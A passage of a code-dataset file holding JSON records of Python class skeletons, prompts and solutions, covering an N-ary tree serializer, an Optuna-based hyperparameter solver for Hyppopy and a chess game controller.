:type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if root is None:\n return ''\n data = []\n deq = collections.deque([root])\n while deq:\n node = deq.popleft()\n data.append(node.val)\n data.append(str(0 if not node.children else len(node.children)))\n if node.children:\n for child in node.children:\n deq.append(child)\n return ','.join(data)\n<|end_body_0|>\n\n<|body_start_1|>\n if len(data) == 0:\n return None\n data = data.split(',')\n root = Node(int(data[0]), [])\n n = int(data[1])\n deq = collections.deque([(root, n)])\n i = 2\n while deq:\n node, n = deq.popleft()\n for j in range(i, i + 2 * n, 2):\n child = Node(int(data[j]), [])\n k = int(data[j + 1])\n node.children.append(child)\n deq.append((child, k))\n i += 2 * n\n return root\n<|end_body_1|>\n", "revision_id": "6ff1941ff213a843013100ac7033e2d4f90fbd6a", "skeleton": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root: 'Node') -> str:\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data: str) -> 'Node':\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Codec:\n def serialize(self, root: 'Node') -> str:\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n if root is None:\n return ''\n data = []\n deq = collections.deque([root])\n while deq:\n node = deq.popleft()\n data.append(node.val)\n data.append(str(0 if not node.children else len(node.children)))\n if node.children:\n for child in node.children:\n deq.append(child)\n return ','.join(data)\n\n def deserialize(self, data: str) -> 'Node':\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n if len(data) == 0:\n return None\n data = data.split(',')\n root = Node(int(data[0]), [])\n n = int(data[1])\n deq = collections.deque([(root, n)])\n i = 2\n while deq:\n node, n = deq.popleft()\n for j in range(i, i + 2 * n, 2):\n child = Node(int(data[j]), [])\n k = int(data[j + 1])\n node.children.append(child)\n deq.append((child, k))\n i += 2 * n\n return root\n", "source": "the_stack_v2_python_sparse", "source_path": "Leetcode 0428. 
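The Codec record is self-contained apart from the Node class and the collections import, so its BFS encoding (alternating value, child-count) can be exercised end to end. One caveat: the dumped serialize appends node.val without str(), so ','.join would raise TypeError for the problem's integer values; the round-trip sketch below converts explicitly, and supplies Node as the obvious two-field class the code assumes.

import collections

class Node:
    def __init__(self, val, children):
        self.val = val
        self.children = children

def serialize(root):
    # BFS: emit "val,child_count" pairs; values must be strings for join
    if root is None:
        return ''
    data, deq = [], collections.deque([root])
    while deq:
        node = deq.popleft()
        data.append(str(node.val))
        data.append(str(len(node.children or [])))
        deq.extend(node.children or [])
    return ','.join(data)

def deserialize(data):
    if not data:
        return None
    data = data.split(',')
    root = Node(int(data[0]), [])
    deq, i = collections.deque([(root, int(data[1]))]), 2
    while deq:
        node, n = deq.popleft()
        for j in range(i, i + 2 * n, 2):
            child = Node(int(data[j]), [])
            node.children.append(child)
            deq.append((child, int(data[j + 1])))
        i += 2 * n
    return root

tree = Node(1, [Node(3, [Node(5, []), Node(6, [])]), Node(2, []), Node(4, [])])
assert serialize(tree) == '1,3,3,2,2,0,4,0,5,0,6,0'
assert serialize(deserialize(serialize(tree))) == serialize(tree)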
Serialize and Deserialize N-ary Tree.py", "source_repo": "Chaoran-sjsu/leetcode", "split": "test", "star_events_count": 0} {"blob_id": "931b328fbaf30efd4dc3ac2ffe55b64c5bb4c7a6", "bodies": ["HyppopySolver.__init__(self, project)\nself._searchspace = None\nself.candidates_list = list()", "self._add_member('max_iterations', int)\nself._add_hyperparameter_signature(name='domain', dtype=str, options=['uniform', 'categorical'])\nself._add_hyperparameter_signature(name='data', dtype=list)\nself._add_hyperparameter_signature(name='type', dtype=type)", "candidates_list = list()\nN = self.max_iterations\nfor n in range(N):\n print(n)\n from optuna import trial as trial_module\n trial_id = self.study._storage.create_new_trial_id(0)\n trial = trial_module.Trial(self.study, trial_id)\n params = {}\n for name, param in self._searchspace.items():\n if param['domain'] == 'categorical':\n params[name] = trial.suggest_categorical(name, param['data'])\n else:\n params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])\n candidates_list.append(CandidateDescriptor(**params))\nreturn candidates_list\nN = self.max_iterations\nfor n in range(N):\n params = {}\n for name, param in self._searchspace.items():\n if param['domain'] == 'categorical':\n params[name] = trial.suggest_categorical(name, param['data'])\n else:\n params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])\n candidates_list.append(CandidateDescriptor(**params))\nreturn candidates_list", "params = {}\nfor name, param in self._searchspace.items():\n if param['domain'] == 'categorical':\n params[name] = trial.suggest_categorical(name, param['data'])\n else:\n params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])\nreturn self.loss_function(**params)", "LOG.debug('execute_solver using solution space:\\n\\n\\t{}\\n'.format(pformat(searchspace)))\nself._searchspace = searchspace\ntry:\n study = optuna.create_study()\n study.optimize(self.trial_cache, n_trials=self.max_iterations)\n self.best = study.best_trial.params\nexcept Exception as e:\n LOG.error('internal error in bayes_opt maximize occured. {}'.format(e))\n raise BrokenPipeError('internal error in bayes_opt maximize occured. {}'.format(e))", "LOG.debug('convert input parameter\\n\\n\\t{}\\n'.format(pformat(hyperparameter)))\nfor name, param in hyperparameter.items():\n if param['domain'] != 'categorical' and param['domain'] != 'uniform':\n msg = 'Warning: Optuna cannot handle {} domain. 
Only uniform and categorical domains are supported!'.format(param['domain'])\n warnings.warn(msg)\n LOG.warning(msg)\nreturn hyperparameter"], "bodies_text": "<|body_start_0|>\n HyppopySolver.__init__(self, project)\n self._searchspace = None\n self.candidates_list = list()\n<|end_body_0|>\n\n<|body_start_1|>\n self._add_member('max_iterations', int)\n self._add_hyperparameter_signature(name='domain', dtype=str, options=['uniform', 'categorical'])\n self._add_hyperparameter_signature(name='data', dtype=list)\n self._add_hyperparameter_signature(name='type', dtype=type)\n<|end_body_1|>\n\n<|body_start_2|>\n candidates_list = list()\n N = self.max_iterations\n for n in range(N):\n print(n)\n from optuna import trial as trial_module\n trial_id = self.study._storage.create_new_trial_id(0)\n trial = trial_module.Trial(self.study, trial_id)\n params = {}\n for name, param in self._searchspace.items():\n if param['domain'] == 'categorical':\n params[name] = trial.suggest_categorical(name, param['data'])\n else:\n params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])\n candidates_list.append(CandidateDescriptor(**params))\n return candidates_list\n N = self.max_iterations\n for n in range(N):\n params = {}\n for name, param in self._searchspace.items():\n if param['domain'] == 'categorical':\n params[name] = trial.suggest_categorical(name, param['data'])\n else:\n params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])\n candidates_list.append(CandidateDescriptor(**params))\n return candidates_list\n<|end_body_2|>\n\n<|body_start_3|>\n params = {}\n for name, param in self._searchspace.items():\n if param['domain'] == 'categorical':\n params[name] = trial.suggest_categorical(name, param['data'])\n else:\n params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])\n return self.loss_function(**params)\n<|end_body_3|>\n\n<|body_start_4|>\n LOG.debug('execute_solver using solution space:\\n\\n\\t{}\\n'.format(pformat(searchspace)))\n self._searchspace = searchspace\n try:\n study = optuna.create_study()\n study.optimize(self.trial_cache, n_trials=self.max_iterations)\n self.best = study.best_trial.params\n except Exception as e:\n LOG.error('internal error in bayes_opt maximize occured. {}'.format(e))\n raise BrokenPipeError('internal error in bayes_opt maximize occured. {}'.format(e))\n<|end_body_4|>\n\n<|body_start_5|>\n LOG.debug('convert input parameter\\n\\n\\t{}\\n'.format(pformat(hyperparameter)))\n for name, param in hyperparameter.items():\n if param['domain'] != 'categorical' and param['domain'] != 'uniform':\n msg = 'Warning: Optuna cannot handle {} domain. Only uniform and categorical domains are supported!'.format(param['domain'])\n warnings.warn(msg)\n LOG.warning(msg)\n return hyperparameter\n<|end_body_5|>\n", "class_docstring": "", "class_name": "OptunaSolver", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass OptunaSolver:\n\n def __init__(self, project=None):\n \"\"\"The constructor accepts a HyppopyProject. :param project: [HyppopyProject] project instance, default=None\"\"\"\n <|body_0|>\n\n def define_interface(self):\n \"\"\"This function is called when HyppopySolver.__init__ function finished. Child classes need to define their individual parameter here by calling the _add_member function for each class member variable need to be defined. Using _add_hyperparameter_signature the structure of a hyperparameter the solver expects must be defined. 
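As dumped, get_candidates returns out of its first loop, so everything after the first return candidates_list (a second copy of the loop, with no Trial creation) is unreachable leftover code. A cleaned-up sketch of the live path; since the record leans on optuna's private older API (self.study._storage.create_new_trial_id) and hyppopy's CandidateDescriptor, the suggestion calls are replaced here with plain random sampling and a stub descriptor so the sketch runs standalone.

import random

class CandidateDescriptor:
    # minimal stand-in for hyppopy's CandidateDescriptor: keeps kwargs around
    def __init__(self, **params):
        self.params = params

def get_candidates(searchspace, max_iterations, rng=random.Random(0)):
    """Live path of the record's get_candidates, one candidate per iteration."""
    candidates = []
    for _ in range(max_iterations):
        params = {}
        for name, param in searchspace.items():
            if param['domain'] == 'categorical':
                params[name] = rng.choice(param['data'])
            else:  # 'uniform'
                lo, hi = param['data'][0], param['data'][1]
                params[name] = rng.uniform(lo, hi)
        candidates.append(CandidateDescriptor(**params))
    return candidates

space = {'lr': {'domain': 'uniform', 'data': [1e-4, 1e-1]},
         'kernel': {'domain': 'categorical', 'data': ['rbf', 'linear']}}
for c in get_candidates(space, 3):
    print(c.params)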
Both, members and hyperparameter signatures are later get checked, before executing the solver, ensuring settings passed fullfill solver needs.\"\"\"\n <|body_1|>\n\n def get_candidates(self, trial=None):\n \"\"\"This function converts the searchspace to a candidate_list that can then be used to distribute via MPI. :param searchspace: converted hyperparameter space\"\"\"\n <|body_2|>\n\n def trial_cache(self, trial):\n \"\"\"Optuna specific loss function wrapper :param trial: [Trial] instance :return: [function] loss function\"\"\"\n <|body_3|>\n\n def execute_solver(self, searchspace):\n \"\"\"This function is called immediately after convert_searchspace and get the output of the latter as input. It's purpose is to call the solver libs main optimization function. :param searchspace: converted hyperparameter space\"\"\"\n <|body_4|>\n\n def convert_searchspace(self, hyperparameter):\n \"\"\"This function gets the unified hyppopy-like parameterspace description as input and, if necessary, should convert it into a solver lib specific format. The function is invoked when run is called and what it returns is passed as searchspace argument to the function execute_solver. :param hyperparameter: [dict] nested parameter description dict e.g. {'name': {'domain':'uniform', 'data':[0,1], 'type':'float'}, ...} :return: [object] converted hyperparameter space\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n HyppopySolver.__init__(self, project)\n self._searchspace = None\n self.candidates_list = list()\n<|end_body_0|>\n\n<|body_start_1|>\n self._add_member('max_iterations', int)\n self._add_hyperparameter_signature(name='domain', dtype=str, options=['uniform', 'categorical'])\n self._add_hyperparameter_signature(name='data', dtype=list)\n self._add_hyperparameter_signature(name='type', dtype=type)\n<|end_body_1|>\n\n<|body_start_2|>\n candidates_list = list()\n N = self.max_iterations\n for n in range(N):\n print(n)\n from optuna import trial as trial_module\n trial_id = self.study._storage.create_new_trial_id(0)\n trial = trial_module.Trial(self.study, trial_id)\n params = {}\n for name, param in self._searchspace.items():\n if param['domain'] == 'categorical':\n params[name] = trial.suggest_categorical(name, param['data'])\n else:\n params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])\n candidates_list.append(CandidateDescriptor(**params))\n return candidates_list\n N = self.max_iterations\n for n in range(N):\n params = {}\n for name, param in self._searchspace.items():\n if param['domain'] == 'categorical':\n params[name] = trial.suggest_categorical(name, param['data'])\n else:\n params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])\n candidates_list.append(CandidateDescriptor(**params))\n return candidates_list\n<|end_body_2|>\n\n<|body_start_3|>\n params = {}\n for name, param in self._searchspace.items():\n if param['domain'] == 'categorical':\n params[name] = trial.suggest_categorical(name, param['data'])\n else:\n params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])\n return self.loss_function(**params)\n<|end_body_3|>\n\n<|body_start_4|>\n LOG.debug('execute_solver using solution space:\\n\\n\\t{}\\n'.format(pformat(searchspace)))\n self._searchspace = searchspace\n try:\n study = optuna.create_study()\n study.optimize(self.trial_cache, n_trials=self.max_iterations)\n self.best = study.best_trial.params\n except Exception as e:\n LOG.error('internal error in bayes_opt maximize occured. 
{}'.format(e))\n raise BrokenPipeError('internal error in bayes_opt maximize occured. {}'.format(e))\n<|end_body_4|>\n\n<|body_start_5|>\n LOG.debug('convert input parameter\\n\\n\\t{}\\n'.format(pformat(hyperparameter)))\n for name, param in hyperparameter.items():\n if param['domain'] != 'categorical' and param['domain'] != 'uniform':\n msg = 'Warning: Optuna cannot handle {} domain. Only uniform and categorical domains are supported!'.format(param['domain'])\n warnings.warn(msg)\n LOG.warning(msg)\n return hyperparameter\n<|end_body_5|>\n", "id": "stack_v2_sparse_classes_10k_test_000045", "length_bytes": 6091, "license_type": "no_license", "methods": [{"docstring": "The constructor accepts a HyppopyProject. :param project: [HyppopyProject] project instance, default=None", "name": "__init__", "signature": "def __init__(self, project=None)"}, {"docstring": "This function is called when HyppopySolver.__init__ function finished. Child classes need to define their individual parameter here by calling the _add_member function for each class member variable need to be defined. Using _add_hyperparameter_signature the structure of a hyperparameter the solver expects must be defined. Both, members and hyperparameter signatures are later get checked, before executing the solver, ensuring settings passed fullfill solver needs.", "name": "define_interface", "signature": "def define_interface(self)"}, {"docstring": "This function converts the searchspace to a candidate_list that can then be used to distribute via MPI. :param searchspace: converted hyperparameter space", "name": "get_candidates", "signature": "def get_candidates(self, trial=None)"}, {"docstring": "Optuna specific loss function wrapper :param trial: [Trial] instance :return: [function] loss function", "name": "trial_cache", "signature": "def trial_cache(self, trial)"}, {"docstring": "This function is called immediately after convert_searchspace and get the output of the latter as input. It's purpose is to call the solver libs main optimization function. :param searchspace: converted hyperparameter space", "name": "execute_solver", "signature": "def execute_solver(self, searchspace)"}, {"docstring": "This function gets the unified hyppopy-like parameterspace description as input and, if necessary, should convert it into a solver lib specific format. The function is invoked when run is called and what it returns is passed as searchspace argument to the function execute_solver. :param hyperparameter: [dict] nested parameter description dict e.g. {'name': {'domain':'uniform', 'data':[0,1], 'type':'float'}, ...} :return: [object] converted hyperparameter space", "name": "convert_searchspace", "signature": "def convert_searchspace(self, hyperparameter)"}], "n_methods": 6, "original_id": "stack_v2_sparse_classes_30k_train_002507", "prompt": "Implement the Python class `OptunaSolver` described below.\n\nClass description:\nImplement the OptunaSolver class.\n\nMethod signatures and docstrings:\n- def __init__(self, project=None): The constructor accepts a HyppopyProject. :param project: [HyppopyProject] project instance, default=None\n- def define_interface(self): This function is called when HyppopySolver.__init__ function finished. Child classes need to define their individual parameter here by calling the _add_member function for each class member variable need to be defined. Using _add_hyperparameter_signature the structure of a hyperparameter the solver expects must be defined. 
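trial_cache is exactly the callable optuna expects: it takes a Trial, suggests one value per hyperparameter (suggest_categorical for categorical domains, suggest_uniform otherwise) and returns the loss. A minimal end-to-end run of that pattern, assuming an installed optuna version that still provides suggest_uniform; the quadratic loss is a placeholder for the solver's real loss_function.

import optuna

searchspace = {'x': {'domain': 'uniform', 'data': [-5.0, 5.0]},
               'act': {'domain': 'categorical', 'data': ['relu', 'tanh']}}

def loss_function(x, act):
    # placeholder loss: minimum at x == 2 regardless of the categorical choice
    return (x - 2.0) ** 2

def objective(trial):
    # same shape as the record's trial_cache
    params = {}
    for name, param in searchspace.items():
        if param['domain'] == 'categorical':
            params[name] = trial.suggest_categorical(name, param['data'])
        else:
            # deprecated alias of trial.suggest_float(...) in newer optuna,
            # kept here to mirror the record
            params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])
    return loss_function(**params)

study = optuna.create_study()       # minimizes by default
study.optimize(objective, n_trials=50)
print(study.best_trial.params)      # x should land close to 2.0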
Both member and hyperparameter signatures are later checked before executing the solver, ensuring the settings passed fulfill the solver's needs.\n- def get_candidates(self, trial=None): This function converts the searchspace to a candidate_list that can then be used to distribute via MPI. :param searchspace: converted hyperparameter space\n- def trial_cache(self, trial): Optuna specific loss function wrapper :param trial: [Trial] instance :return: [function] loss function\n- def execute_solver(self, searchspace): This function is called immediately after convert_searchspace and gets the output of the latter as input. Its purpose is to call the solver lib's main optimization function. :param searchspace: converted hyperparameter space\n- def convert_searchspace(self, hyperparameter): This function gets the unified hyppopy-like parameterspace description as input and, if necessary, should convert it into a solver lib specific format. The function is invoked when run is called and what it returns is passed as searchspace argument to the function execute_solver. :param hyperparameter: [dict] nested parameter description dict e.g. {'name': {'domain':'uniform', 'data':[0,1], 'type':'float'}, ...} :return: [object] converted hyperparameter space", "prompted_full_text": "Implement the Python class `OptunaSolver` described below.\n\nClass description:\nImplement the OptunaSolver class.\n\nMethod signatures and docstrings:\n- def __init__(self, project=None): The constructor accepts a HyppopyProject. :param project: [HyppopyProject] project instance, default=None\n- def define_interface(self): This function is called when the HyppopySolver.__init__ function has finished. Child classes need to define their individual parameters here by calling the _add_member function for each class member variable that needs to be defined. Using _add_hyperparameter_signature, the structure of a hyperparameter the solver expects must be defined. Both member and hyperparameter signatures are later checked before executing the solver, ensuring the settings passed fulfill the solver's needs.\n- def get_candidates(self, trial=None): This function converts the searchspace to a candidate_list that can then be used to distribute via MPI. :param searchspace: converted hyperparameter space\n- def trial_cache(self, trial): Optuna specific loss function wrapper :param trial: [Trial] instance :return: [function] loss function\n- def execute_solver(self, searchspace): This function is called immediately after convert_searchspace and gets the output of the latter as input. Its purpose is to call the solver lib's main optimization function. :param searchspace: converted hyperparameter space\n- def convert_searchspace(self, hyperparameter): This function gets the unified hyppopy-like parameterspace description as input and, if necessary, should convert it into a solver lib specific format. The function is invoked when run is called and what it returns is passed as searchspace argument to the function execute_solver. :param hyperparameter: [dict] nested parameter description dict e.g. {'name': {'domain':'uniform', 'data':[0,1], 'type':'float'}, ...} :return: [object] converted hyperparameter space\n\n<|skeleton|>\nclass OptunaSolver:\n\n def __init__(self, project=None):\n \"\"\"The constructor accepts a HyppopyProject. :param project: [HyppopyProject] project instance, default=None\"\"\"\n <|body_0|>\n\n def define_interface(self):\n \"\"\"This function is called when the HyppopySolver.__init__ function has finished. 
Child classes need to define their individual parameters here by calling the _add_member function for each class member variable that needs to be defined. Using _add_hyperparameter_signature, the structure of a hyperparameter the solver expects must be defined. Both member and hyperparameter signatures are later checked before executing the solver, ensuring the settings passed fulfill the solver's needs.\"\"\"\n <|body_1|>\n\n def get_candidates(self, trial=None):\n \"\"\"This function converts the searchspace to a candidate_list that can then be used to distribute via MPI. :param searchspace: converted hyperparameter space\"\"\"\n <|body_2|>\n\n def trial_cache(self, trial):\n \"\"\"Optuna specific loss function wrapper :param trial: [Trial] instance :return: [function] loss function\"\"\"\n <|body_3|>\n\n def execute_solver(self, searchspace):\n \"\"\"This function is called immediately after convert_searchspace and gets the output of the latter as input. Its purpose is to call the solver lib's main optimization function. :param searchspace: converted hyperparameter space\"\"\"\n <|body_4|>\n\n def convert_searchspace(self, hyperparameter):\n \"\"\"This function gets the unified hyppopy-like parameterspace description as input and, if necessary, should convert it into a solver lib specific format. The function is invoked when run is called and what it returns is passed as searchspace argument to the function execute_solver. :param hyperparameter: [dict] nested parameter description dict e.g. {'name': {'domain':'uniform', 'data':[0,1], 'type':'float'}, ...} :return: [object] converted hyperparameter space\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n HyppopySolver.__init__(self, project)\n self._searchspace = None\n self.candidates_list = list()\n<|end_body_0|>\n\n<|body_start_1|>\n self._add_member('max_iterations', int)\n self._add_hyperparameter_signature(name='domain', dtype=str, options=['uniform', 'categorical'])\n self._add_hyperparameter_signature(name='data', dtype=list)\n self._add_hyperparameter_signature(name='type', dtype=type)\n<|end_body_1|>\n\n<|body_start_2|>\n candidates_list = list()\n N = self.max_iterations\n for n in range(N):\n print(n)\n from optuna import trial as trial_module\n trial_id = self.study._storage.create_new_trial_id(0)\n trial = trial_module.Trial(self.study, trial_id)\n params = {}\n for name, param in self._searchspace.items():\n if param['domain'] == 'categorical':\n params[name] = trial.suggest_categorical(name, param['data'])\n else:\n params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])\n candidates_list.append(CandidateDescriptor(**params))\n return candidates_list\n<|end_body_2|>\n\n<|body_start_3|>\n params = {}\n for name, param in self._searchspace.items():\n if param['domain'] == 'categorical':\n params[name] = trial.suggest_categorical(name, param['data'])\n else:\n params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])\n return self.loss_function(**params)\n<|end_body_3|>\n\n<|body_start_4|>\n LOG.debug('execute_solver using solution space:\\n\\n\\t{}\\n'.format(pformat(searchspace)))\n self._searchspace = 
searchspace\n try:\n study = optuna.create_study()\n study.optimize(self.trial_cache, n_trials=self.max_iterations)\n self.best = study.best_trial.params\n except Exception as e:\n LOG.error('internal error in optuna optimization occurred. {}'.format(e))\n raise BrokenPipeError('internal error in optuna optimization occurred. {}'.format(e))\n<|end_body_4|>\n\n<|body_start_5|>\n LOG.debug('convert input parameter\\n\\n\\t{}\\n'.format(pformat(hyperparameter)))\n for name, param in hyperparameter.items():\n if param['domain'] != 'categorical' and param['domain'] != 'uniform':\n msg = 'Warning: Optuna cannot handle {} domain. Only uniform and categorical domains are supported!'.format(param['domain'])\n warnings.warn(msg)\n LOG.warning(msg)\n return hyperparameter\n<|end_body_5|>\n", "revision_id": "254adacd6164aceca27794611f57a7ab82e4dc29", "skeleton": "<|skeleton|>\nclass OptunaSolver:\n\n def __init__(self, project=None):\n \"\"\"The constructor accepts a HyppopyProject. :param project: [HyppopyProject] project instance, default=None\"\"\"\n <|body_0|>\n\n def define_interface(self):\n \"\"\"This function is called when the HyppopySolver.__init__ function has finished. Child classes need to define their individual parameters here by calling the _add_member function for each class member variable that needs to be defined. Using _add_hyperparameter_signature, the structure of a hyperparameter the solver expects must be defined. Both member and hyperparameter signatures are later checked before executing the solver, ensuring the settings passed fulfill the solver's needs.\"\"\"\n <|body_1|>\n\n def get_candidates(self, trial=None):\n \"\"\"This function converts the searchspace to a candidate_list that can then be used to distribute via MPI. :param searchspace: converted hyperparameter space\"\"\"\n <|body_2|>\n\n def trial_cache(self, trial):\n \"\"\"Optuna specific loss function wrapper :param trial: [Trial] instance :return: [function] loss function\"\"\"\n <|body_3|>\n\n def execute_solver(self, searchspace):\n \"\"\"This function is called immediately after convert_searchspace and gets the output of the latter as input. Its purpose is to call the solver lib's main optimization function. :param searchspace: converted hyperparameter space\"\"\"\n <|body_4|>\n\n def convert_searchspace(self, hyperparameter):\n \"\"\"This function gets the unified hyppopy-like parameterspace description as input and, if necessary, should convert it into a solver lib specific format. The function is invoked when run is called and what it returns is passed as searchspace argument to the function execute_solver. :param hyperparameter: [dict] nested parameter description dict e.g. {'name': {'domain':'uniform', 'data':[0,1], 'type':'float'}, ...} :return: [object] converted hyperparameter space\"\"\"\n <|body_5|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class OptunaSolver:\n def __init__(self, project=None):\n \"\"\"The constructor accepts a HyppopyProject. :param project: [HyppopyProject] project instance, default=None\"\"\"\n HyppopySolver.__init__(self, project)\n self._searchspace = None\n self.candidates_list = list()\n\n def define_interface(self):\n \"\"\"This function is called when the HyppopySolver.__init__ function has finished. Child classes need to define their individual parameters here by calling the _add_member function for each class member variable that needs to be defined. 
Using _add_hyperparameter_signature, the structure of a hyperparameter the solver expects must be defined. Both member and hyperparameter signatures are later checked before executing the solver, ensuring the settings passed fulfill the solver's needs.\"\"\"\n self._add_member('max_iterations', int)\n self._add_hyperparameter_signature(name='domain', dtype=str, options=['uniform', 'categorical'])\n self._add_hyperparameter_signature(name='data', dtype=list)\n self._add_hyperparameter_signature(name='type', dtype=type)\n\n def get_candidates(self, trial=None):\n \"\"\"This function converts the searchspace to a candidate_list that can then be used to distribute via MPI. :param searchspace: converted hyperparameter space\"\"\"\n candidates_list = list()\n N = self.max_iterations\n for n in range(N):\n print(n)\n from optuna import trial as trial_module\n trial_id = self.study._storage.create_new_trial_id(0)\n trial = trial_module.Trial(self.study, trial_id)\n params = {}\n for name, param in self._searchspace.items():\n if param['domain'] == 'categorical':\n params[name] = trial.suggest_categorical(name, param['data'])\n else:\n params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])\n candidates_list.append(CandidateDescriptor(**params))\n return candidates_list\n\n def trial_cache(self, trial):\n \"\"\"Optuna specific loss function wrapper :param trial: [Trial] instance :return: [function] loss function\"\"\"\n params = {}\n for name, param in self._searchspace.items():\n if param['domain'] == 'categorical':\n params[name] = trial.suggest_categorical(name, param['data'])\n else:\n params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])\n return self.loss_function(**params)\n\n def execute_solver(self, searchspace):\n \"\"\"This function is called immediately after convert_searchspace and gets the output of the latter as input. Its purpose is to call the solver lib's main optimization function. :param searchspace: converted hyperparameter space\"\"\"\n LOG.debug('execute_solver using solution space:\\n\\n\\t{}\\n'.format(pformat(searchspace)))\n self._searchspace = searchspace\n try:\n study = optuna.create_study()\n study.optimize(self.trial_cache, n_trials=self.max_iterations)\n self.best = study.best_trial.params\n except Exception as e:\n LOG.error('internal error in optuna optimization occurred. {}'.format(e))\n raise BrokenPipeError('internal error in optuna optimization occurred. {}'.format(e))\n\n def convert_searchspace(self, hyperparameter):\n \"\"\"This function gets the unified hyppopy-like parameterspace description as input and, if necessary, should convert it into a solver lib specific format. The function is invoked when run is called and what it returns is passed as searchspace argument to the function execute_solver. :param hyperparameter: [dict] nested parameter description dict e.g. 
{'name': {'domain':'uniform', 'data':[0,1], 'type':'float'}, ...} :return: [object] converted hyperparameter space\"\"\"\n LOG.debug('convert input parameter\\n\\n\\t{}\\n'.format(pformat(hyperparameter)))\n for name, param in hyperparameter.items():\n if param['domain'] != 'categorical' and param['domain'] != 'uniform':\n msg = 'Warning: Optuna cannot handle {} domain. Only uniform and categorical domains are supported!'.format(param['domain'])\n warnings.warn(msg)\n LOG.warning(msg)\n return hyperparameter\n", "source": "the_stack_v2_python_sparse", "source_path": "hyppopy/solvers/OptunaSolver.py", "source_repo": "MIC-DKFZ/Hyppopy", "split": "test", "star_events_count": 27} {"blob_id": "254fe63d337b4ad07e5bb446e03181efb825ec0c", "bodies": ["self.game = game\nscreen = GameScreen()\nConsoleController.__init__(self, screen, commands={ENDL: self.nextMessage})", "while not self.game.over:\n self.runController(RoundController(self.game))\nself.stopRunning()"], "bodies_text": "<|body_start_0|>\n self.game = game\n screen = GameScreen()\n ConsoleController.__init__(self, screen, commands={ENDL: self.nextMessage})\n<|end_body_0|>\n\n<|body_start_1|>\n while not self.game.over:\n self.runController(RoundController(self.game))\n self.stopRunning()\n<|end_body_1|>\n", "class_docstring": "Controller for running a game of Chess", "class_name": "GameController", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass GameController:\n \"\"\"Controller for running a game of Chess\"\"\"\n\n def __init__(self, game):\n \"\"\"Initialize the Game Controller\"\"\"\n <|body_0|>\n\n def nextMessage(self, event):\n \"\"\"Tell the screen to print the next message\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.game = game\n screen = GameScreen()\n ConsoleController.__init__(self, screen, commands={ENDL: self.nextMessage})\n<|end_body_0|>\n\n<|body_start_1|>\n while not self.game.over:\n self.runController(RoundController(self.game))\n self.stopRunning()\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000046", "length_bytes": 750, "license_type": "permissive", "methods": [{"docstring": "Initialize the Game Controller", "name": "__init__", "signature": "def __init__(self, game)"}, {"docstring": "Tell the screen to print the next message", "name": "nextMessage", "signature": "def nextMessage(self, event)"}], "n_methods": 2, "prompt": "Implement the Python class `GameController` described below.\n\nClass description:\nController for running a game of Chess\n\nMethod signatures and docstrings:\n- def __init__(self, game): Initialize the Game Controller\n- def nextMessage(self, event): Tell the screen to print the next message", "prompted_full_text": "Implement the Python class `GameController` described below.\n\nClass description:\nController for running a game of Chess\n\nMethod signatures and docstrings:\n- def __init__(self, game): Initialize the Game Controller\n- def nextMessage(self, event): Tell the screen to print the next message\n\n<|skeleton|>\nclass GameController:\n \"\"\"Controller for running a game of Chess\"\"\"\n\n def __init__(self, game):\n \"\"\"Initialize the Game Controller\"\"\"\n <|body_0|>\n\n def nextMessage(self, event):\n \"\"\"Tell the screen to print the next message\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.game = game\n screen = GameScreen()\n ConsoleController.__init__(self, screen, commands={ENDL: self.nextMessage})\n<|end_body_0|>\n\n<|body_start_1|>\n while not 
